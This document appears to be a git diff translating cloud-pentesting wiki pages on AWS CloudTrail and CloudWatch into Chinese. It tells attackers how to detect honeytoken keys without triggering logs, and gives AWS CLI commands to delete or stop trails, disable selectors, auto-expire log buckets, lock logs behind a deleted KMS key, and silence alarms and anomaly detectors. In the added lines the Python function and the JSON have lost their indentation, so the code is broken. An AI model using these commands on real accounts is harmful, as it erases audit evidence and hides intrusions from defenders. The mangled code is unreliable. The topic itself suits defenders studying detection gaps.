[**Canarytokens**](https://canarytokens.org/generate)**、** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**、** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) 创建的 HoneyTokens 要么使用可识别的账户名称,要么为所有客户使用相同的 AWS 账户 ID。因此,如果您可以在不让 Cloudtrail 创建任何日志的情况下获取账户名称和/或账户 ID,**您就可以知道该密钥是否是 HoneyToken**。 -[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** +[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) 有一些规则来检测密钥是否属于 [**Canarytokens**](https://canarytokens.org/generate)**、** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**、** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** -- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message. - - Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name. -- If **`SpaceCrab`** appears in the role name in the error message -- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` -- If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken. +- 如果 **`canarytokens.org`** 出现在角色名称中,或者账户 ID **`534261010715`** 出现在错误消息中。 +- 最近测试时,他们使用的账户是 **`717712589309`**,并且名称中仍然包含 **`canarytokens.com`** 字符串。 +- 如果 **`SpaceCrab`** 出现在错误消息中的角色名称中 +- **SpaceSiren** 使用 **uuids** 生成用户名:`[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` +- 如果 **名称看起来像是随机生成的**,那么它是 HoneyToken 的概率很高。 -#### Get the account ID from the Key ID - -You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of Honeytokens AWS accounts: +#### 从密钥 ID 获取账户 ID +您可以从 **访问密钥** 中的 **编码** 获取 **账户 ID**,如 [**此处所述**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489),并使用您的 HoneyTokens AWS 账户列表检查账户 ID: ```python import base64 import binascii def AWSAccount_from_AWSKeyID(AWSKeyID): - trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix - x = base64.b32decode(trimmed_AWSKeyID) #base32 decode - y = x[0:6] +trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix +x = base64.b32decode(trimmed_AWSKeyID) #base32 decode +y = x[0:6] - z = int.from_bytes(y, byteorder='big', signed=False) - mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) +z = int.from_bytes(y, byteorder='big', signed=False) +mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) - e = (z & mask)>>7 - return (e) +e = (z & mask)>>7 +return (e) print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) ``` +检查更多信息请访问[**原始研究**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)。 -Check more information in the [**orginal research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489). +#### 不生成日志 -#### Do not generate a log +最有效的技术实际上是一个简单的方法。只需使用您刚找到的密钥访问您自己攻击者账户中的某个服务。这将使**CloudTrail在您自己的AWS账户中生成日志,而不是在受害者账户中**。 -The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make **CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims**. +问题在于,输出将显示一个错误,指示账户ID和账户名称,因此**您将能够看到它是否是一个Honeytoken**。 -The things is that the output will show you an error indicating the account ID and the account name so **you will be able to see if it's a Honeytoken**. +#### 没有日志的AWS服务 -#### AWS services without logs +过去有一些**AWS服务不会将日志发送到CloudTrail**(在这里找到[列表](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html))。其中一些服务将**响应**一个**错误**,其中包含**密钥角色的ARN**,如果有人未经授权(即Honeytoken密钥)尝试访问它。 -In the past there were some **AWS services that doesn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) try to access it. - -This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken. +通过这种方式,**攻击者可以在不触发任何日志的情况下获取密钥的ARN**。在ARN中,攻击者可以看到**AWS账户ID和名称**,很容易知道HoneyToken的公司账户ID和名称,因此攻击者可以识别该令牌是否是HoneyToken。 ![](<../../../../images/image (93).png>) > [!CAUTION] -> Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... +> 请注意,所有被发现不创建CloudTrail日志的公共API现在已修复,因此您可能需要自己寻找... > -> For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). +> 有关更多信息,请查看[**原始研究**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/)。 -### Accessing Third Infrastructure +### 访问第三方基础设施 -Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication. +某些AWS服务将**生成一些基础设施**,例如**数据库**或**Kubernetes**集群(EKS)。用户**直接与这些服务交互**(如Kubernetes API)**不会使用AWS API**,因此CloudTrail将无法看到此通信。 -Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by Cloudtrail**. +因此,具有EKS访问权限的用户如果发现EKS API的URL,可以在本地生成一个令牌,并**直接与API服务交谈而不被Cloudtrail检测到**。 -More info in: +更多信息请参见: {{#ref}} ../../aws-post-exploitation/aws-eks-post-exploitation.md {{#endref}} -### Modifying CloudTrail Config - -#### Delete trails +### 修改CloudTrail配置 +#### 删除轨迹 ```bash aws cloudtrail delete-trail --name [trail-name] ``` - -#### Stop trails - +#### 停止跟踪 ```bash aws cloudtrail stop-logging --name [trail-name] ``` - -#### Disable multi-region logging - +#### 禁用多区域日志记录 ```bash aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services ``` - -#### Disable Logging by Event Selectors - +#### 通过事件选择器禁用日志记录 ```bash # Leave only the ReadOnly selector aws cloudtrail put-event-selectors --trail-name --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region @@ -251,49 +236,42 @@ aws cloudtrail put-event-selectors --trail-name --event-selectors ' # Remove all selectors (stop Insights) aws cloudtrail put-event-selectors --trail-name --event-selectors '[]' --region ``` +在第一个示例中,提供了一个包含单个对象的 JSON 数组作为事件选择器。`"ReadWriteType": "ReadOnly"` 表示 **事件选择器仅应捕获只读事件**(因此 CloudTrail insights **不会检查写入** 事件,例如)。 -In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example). - -You can customize the event selector based on your specific requirements. - -#### Logs deletion via S3 lifecycle policy +您可以根据您的具体要求自定义事件选择器。 +#### 通过 S3 生命周期策略删除日志 ```bash aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region ``` +### 修改桶配置 -### Modifying Bucket Configuration +- 删除 S3 桶 +- 更改桶策略以拒绝来自 CloudTrail 服务的任何写入 +- 向 S3 桶添加生命周期策略以删除对象 +- 禁用用于加密 CloudTrail 日志的 kms 密钥 -- Delete the S3 bucket -- Change bucket policy to deny any writes from the CloudTrail service -- Add lifecycle policy to S3 bucket to delete objects -- Disable the kms key used to encrypt the CloudTrail logs +### Cloudtrail 勒索软件 -### Cloudtrail ransomware +#### S3 勒索软件 -#### S3 ransomware - -You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\ -This is basically a **S3-KMS ransomware** explained in: +您可以 **生成一个非对称密钥** 并使 **CloudTrail 使用该密钥加密数据**,然后 **删除私钥**,以便 CloudTrail 内容无法恢复。\ +这基本上是 **S3-KMS 勒索软件**,详见: {{#ref}} ../../aws-post-exploitation/aws-s3-post-exploitation.md {{#endref}} -**KMS ransomware** +**KMS 勒索软件** -This is an easiest way to perform the previous attack with different permissions requirements: +这是以不同权限要求执行前述攻击的最简单方法: {{#ref}} ../../aws-post-exploitation/aws-kms-post-exploitation.md {{#endref}} -## **References** +## **参考文献** - [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md index 0c790b881..0ec23154f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md @@ -4,143 +4,142 @@ ## CloudWatch -**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\ -CloudWatch Log Event have a **size limitation of 256KB on each log line**.\ -It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications. +**CloudWatch** **收集** 监控和操作 **数据**,以日志/指标/事件的形式提供 **AWS 资源**、应用程序和服务的 **统一视图**。\ +CloudWatch 日志事件的 **每行日志大小限制为 256KB**。\ +它可以设置 **高分辨率警报**,并并排可视化 **日志** 和 **指标**,采取自动化行动,排除故障,并发现洞察以优化应用程序。 -You can monitor for example logs from CloudTrail. Events that are monitored: +例如,您可以监控来自 CloudTrail 的日志。监控的事件包括: -- Changes to Security Groups and NACLs -- Starting, Stopping, rebooting and terminating EC2 instances -- Changes to Security Policies within IAM and S3 -- Failed login attempts to the AWS Management Console -- API calls that resulted in failed authorization -- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) +- 对安全组和 NACL 的更改 +- 启动、停止、重启和终止 EC2 实例 +- IAM 和 S3 中安全策略的更改 +- 对 AWS 管理控制台的登录失败尝试 +- 导致授权失败的 API 调用 +- 在 CloudWatch 中搜索的过滤器: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) -## Key concepts +## 关键概念 -### Namespaces +### 命名空间 -A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them. +命名空间是 CloudWatch 指标的容器。它有助于对指标进行分类和隔离,使管理和分析变得更容易。 -- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. +- **示例**:AWS/EC2 用于与 EC2 相关的指标,AWS/RDS 用于 RDS 指标。 -### Metrics +### 指标 -Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations. +指标是随时间收集的数据点,代表 AWS 资源的性能或利用率。指标可以从 AWS 服务、自定义应用程序或第三方集成中收集。 -- **Example**: CPUUtilization, NetworkIn, DiskReadOps. +- **示例**:CPUUtilization、NetworkIn、DiskReadOps。 -### Dimensions +### 维度 -Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes. +维度是指标的一部分的键值对。它们有助于唯一标识一个指标并提供额外的上下文,最多可以与一个指标关联 30 个维度。维度还允许根据特定属性过滤和聚合指标。 -- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. +- **示例**:对于 EC2 实例,维度可能包括 InstanceId、InstanceType 和 AvailabilityZone。 -### Statistics +### 统计信息 -Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount. +统计信息是对指标数据进行的数学计算,以便随时间对其进行汇总。常见的统计信息包括平均值、总和、最小值、最大值和样本计数。 -- **Example**: Calculating the average CPU utilization over a period of one hour. +- **示例**:计算一小时内的平均 CPU 利用率。 -### Units +### 单位 -Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count. +单位是与指标相关的测量类型。单位有助于为指标数据提供上下文和意义。常见单位包括百分比、字节、秒、计数。 -- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. +- **示例**:CPUUtilization 可能以百分比为单位,而 NetworkIn 可能以字节为单位。 -## CloudWatch Features +## CloudWatch 特性 -### Dashboard +### 仪表板 -**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services. +**CloudWatch 仪表板** 提供可自定义的 **AWS CloudWatch 指标视图**。可以创建和配置仪表板,以在单一视图中可视化数据并监控资源,结合来自各种 AWS 服务的不同指标。 -**Key Features**: +**关键特性**: -- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. -- **Customization**: Layout and content can be customized to fit specific monitoring needs. +- **小部件**:仪表板的构建块,包括图表、文本、警报等。 +- **自定义**:布局和内容可以根据特定监控需求进行自定义。 -**Example Use Case**: +**示例用例**: -- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. +- 一个仪表板显示您整个 AWS 环境的关键指标,包括 EC2 实例、RDS 数据库和 S3 存储桶。 -### Metric Stream and Metric Data +### 指标流和指标数据 -**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS. +**指标流** 在 AWS CloudWatch 中使您能够近乎实时地持续流式传输 CloudWatch 指标到您选择的目标。这对于使用 AWS 之外的工具进行高级监控、分析和自定义仪表板特别有用。 -**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources. +**指标数据** 在指标流中指的是正在流式传输的实际测量或数据点。这些数据点代表 AWS 资源的各种指标,如 CPU 利用率、内存使用等。 -**Example Use Case**: +**示例用例**: -- Sending real-time metrics to a third-party monitoring service for advanced analysis. -- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. +- 将实时指标发送到第三方监控服务以进行高级分析。 +- 将指标存档到 Amazon S3 存储桶中以进行长期存储和合规性。 -### Alarm +### 警报 -**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function. +**CloudWatch 警报** 监控您的指标并根据预定义的阈值执行操作。当指标突破阈值时,警报可以执行一个或多个操作,例如通过 SNS 发送通知、触发自动扩展策略或运行 AWS Lambda 函数。 -**Key Components**: +**关键组件**: -- **Threshold**: The value at which the alarm triggers. -- **Evaluation Periods**: The number of periods over which data is evaluated. -- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm -- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). +- **阈值**:触发警报的值。 +- **评估周期**:评估数据的周期数。 +- **触发警报的数据点**:触发警报所需达到阈值的周期数。 +- **操作**:当警报状态被触发时发生的事情(例如,通过 SNS 通知)。 -**Example Use Case**: +**示例用例**: -- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. +- 监控 EC2 实例的 CPU 利用率,如果超过 80% 持续 5 分钟,则通过 SNS 发送通知。 -### Anomaly Detectors +### 异常检测器 -**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues. +**异常检测器** 使用机器学习自动检测您的指标中的异常。您可以将异常检测应用于任何 CloudWatch 指标,以识别可能表明问题的正常模式的偏差。 -**Key Components**: +**关键组件**: -- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. -- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. +- **模型训练**:CloudWatch 使用历史数据训练模型并建立正常行为的标准。 +- **异常检测带**:指标预期值范围的可视化表示。 -**Example Use Case**: +**示例用例**: -- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. +- 检测 EC2 实例中异常的 CPU 利用率模式,这可能表明安全漏洞或应用程序问题。 -### Insight Rules and Managed Insight Rules +### 洞察规则和托管洞察规则 -**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization. +**洞察规则** 允许您使用 **强大的数学表达式** 来定义应采取行动的条件,以识别趋势、检测峰值或其他感兴趣的模式。这些规则可以帮助您识别资源性能和利用率中的异常或不寻常行为。 -**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration. +**托管洞察规则** 是 AWS 提供的预配置 **洞察规则**。它们旨在监控特定的 AWS 服务或常见用例,可以在无需详细配置的情况下启用。 -**Example Use Case**: +**示例用例**: -- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. +- 监控 RDS 性能:启用一个针对 Amazon RDS 的托管洞察规则,监控关键性能指标,如 CPU 利用率、内存使用和磁盘 I/O。如果这些指标中的任何一个超过安全操作阈值,该规则可以触发警报或自动缓解措施。 -### CloudWatch Logs +### CloudWatch 日志 -Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported. +允许 **聚合和监控来自应用程序** 和系统的日志,来自 **AWS 服务**(包括 CloudTrail)和 **来自应用程序/系统**(**CloudWatch Agent** 可以安装在主机上)。日志可以 **无限期存储**(取决于日志组设置)并可以导出。 -**Elements**: +**元素**: -| **Log Group** | A **collection of log streams** that share the same retention, monitoring, and access control settings | -| ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | -| **Log Stream** | A sequence of **log events** that share the **same source** | -| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function | +| **日志组** | 一组 **共享相同保留、监控和访问控制设置的日志流** | +| ---------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | +| **日志流** | 一系列 **共享相同来源的日志事件** | +| **订阅过滤器** | 定义一个 **匹配特定日志组中事件的过滤模式**,将其发送到 Kinesis Data Firehose 流、Kinesis 流或 Lambda 函数 | -### CloudWatch Monitoring & Events +### CloudWatch 监控与事件 -CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\ -In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams) +CloudWatch **基本** 每 **5 分钟** 聚合数据(**详细** 每 **1 分钟** 聚合)。在聚合后,它 **检查警报的阈值**,以防需要触发一个。\ +在这种情况下,CloudWatch 可以准备发送事件并执行一些自动操作(AWS Lambda 函数、SNS 主题、SQS 队列、Kinesis 流)。 -### Agent Installation +### 代理安装 -You can install agents inside your machines/containers to automatically send the logs back to CloudWatch. +您可以在机器/容器内部安装代理,以自动将日志发送回 CloudWatch。 -- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) -- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage -- **Configure** and **start** the CloudWatch Agent +- **创建** 一个 **角色** 并 **附加** 到具有允许 CloudWatch 从实例收集数据的权限的 **实例**,此外还与 AWS 系统管理 SSM 交互(CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) +- **下载** 并 **安装** **代理** 到 EC2 实例上 ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip))。您可以从 EC2 内部下载,或使用 AWS 系统管理自动安装,选择包 AWS-ConfigureAWSPackage +- **配置** 并 **启动** CloudWatch Agent -A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. - -## Enumeration +一个日志组有多个流。一个流有多个事件。在每个流内,事件保证是有序的。 +## 枚举 ```bash # Dashboards # @@ -213,250 +212,217 @@ aws events describe-event-source --name aws events list-replays aws events list-api-destinations aws events list-event-buses ``` - ## Post-Exploitation / Bypass ### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`** -An attacker with this permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents. - -In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete. +拥有这些权限的攻击者可能会严重削弱组织的监控和警报基础设施。通过删除现有警报,攻击者可以禁用通知管理员关键性能问题、安全漏洞或操作故障的重要警报。此外,通过创建或修改指标警报,攻击者还可以用虚假警报误导管理员或使合法警报失效,从而有效掩盖恶意活动并阻止对实际事件的及时响应。 +此外,拥有 **`cloudwatch:PutCompositeAlarm`** 权限的攻击者将能够创建一个复合警报的循环或周期,其中复合警报 A 依赖于复合警报 B,而复合警报 B 也依赖于复合警报 A。在这种情况下,无法删除任何属于该循环的复合警报,因为总是还有一个依赖于您想要删除的警报的复合警报。 ```bash aws cloudwatch put-metric-alarm --cli-input-json | --alarm-name --comparison-operator --evaluation-periods [--datapoints-to-alarm ] [--threshold ] [--alarm-description ] [--alarm-actions ] [--metric-name ] [--namespace ] [--statistic ] [--dimensions ] [--period ] aws cloudwatch delete-alarms --alarm-names aws cloudwatch put-composite-alarm --alarm-name --alarm-rule [--no-actions-enabled | --actions-enabled [--alarm-actions ] [--insufficient-data-actions ] [--ok-actions ] ] ``` +以下示例显示了如何使指标警报失效: -The following example shows how to make a metric alarm ineffective: - -- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. -- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. +- 此指标警报监控特定 EC2 实例的平均 CPU 利用率,每 300 秒评估一次指标,并需要 6 个评估周期(总共 30 分钟)。如果平均 CPU 利用率在这 6 个周期中至少有 4 个周期超过 60%,则警报将触发并向指定的 SNS 主题发送通知。 +- 通过将阈值修改为超过 99%,将周期设置为 10 秒,将评估周期设置为 8640(因为 8640 个 10 秒的周期等于 1 天),并将报警的数据点设置为 8640,CPU 利用率必须在整个 24 小时内每 10 秒超过 99% 才能触发警报。 {{#tabs }} {{#tab name="Original Metric Alarm" }} - ```json { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-01234567890123456" - } - ], - "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], - "ComparisonOperator": "GreaterThanThreshold", - "DatapointsToAlarm": 4, - "EvaluationPeriods": 6, - "Period": 300, - "Statistic": "Average", - "Threshold": 60, - "AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%", - "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-01234567890123456" +} +], +"AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], +"ComparisonOperator": "GreaterThanThreshold", +"DatapointsToAlarm": 4, +"EvaluationPeriods": 6, +"Period": 300, +"Statistic": "Average", +"Threshold": 60, +"AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%", +"AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" } ``` - {{#endtab }} -{{#tab name="Modified Metric Alarm" }} - +{{#tab name="修改后的指标警报" }} ```json { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0645d6d414dadf9f8" - } - ], - "AlarmActions": [], - "ComparisonOperator": "GreaterThanThreshold", - "DatapointsToAlarm": 8640, - "EvaluationPeriods": 8640, - "Period": 10, - "Statistic": "Average", - "Threshold": 99, - "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", - "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0645d6d414dadf9f8" +} +], +"AlarmActions": [], +"ComparisonOperator": "GreaterThanThreshold", +"DatapointsToAlarm": 8640, +"EvaluationPeriods": 8640, +"Period": 10, +"Statistic": "Average", +"Threshold": 99, +"AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", +"AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" } ``` - {{#endtab }} {{#endtabs }} -**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. +**潜在影响**:缺乏对关键事件的通知,可能存在未被发现的问题,虚假警报,抑制真实警报,可能错过对真实事件的检测。 ### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`** -By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response. +通过删除警报操作,攻击者可以防止在达到警报状态时触发关键警报和自动响应,例如通知管理员或触发自动扩展活动。不当启用或重新启用警报操作也可能导致意外行为,可能通过重新激活先前禁用的操作或修改触发的操作,导致事件响应中的混淆和误导。 -In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures. - -- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. +此外,拥有权限的攻击者可以操纵警报状态,能够创建虚假警报以分散和混淆管理员,或使真实警报静音以掩盖正在进行的恶意活动或关键系统故障。 +- 如果您在复合警报上使用 **`SetAlarmState`**,则复合警报不保证返回其实际状态。只有在其子警报状态发生变化时,它才会返回其实际状态。如果您更新其配置,它也会被重新评估。 ```bash aws cloudwatch disable-alarm-actions --alarm-names aws cloudwatch enable-alarm-actions --alarm-names aws cloudwatch set-alarm-state --alarm-name --state-value --state-reason [--state-reason-data ] ``` - -**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. +**潜在影响**:缺乏对关键事件的通知,可能未被检测到的问题,虚假警报,抑制真实警报,可能错过对真实事件的检测。 ### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`** -An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring. - +攻击者将能够破坏检测和响应指标数据中异常模式或异常的能力。通过删除现有的异常检测器,攻击者可以禁用关键的警报机制;通过创建或修改它们,攻击者将能够错误配置或制造虚假警报,以分散或压倒监控。 ```bash 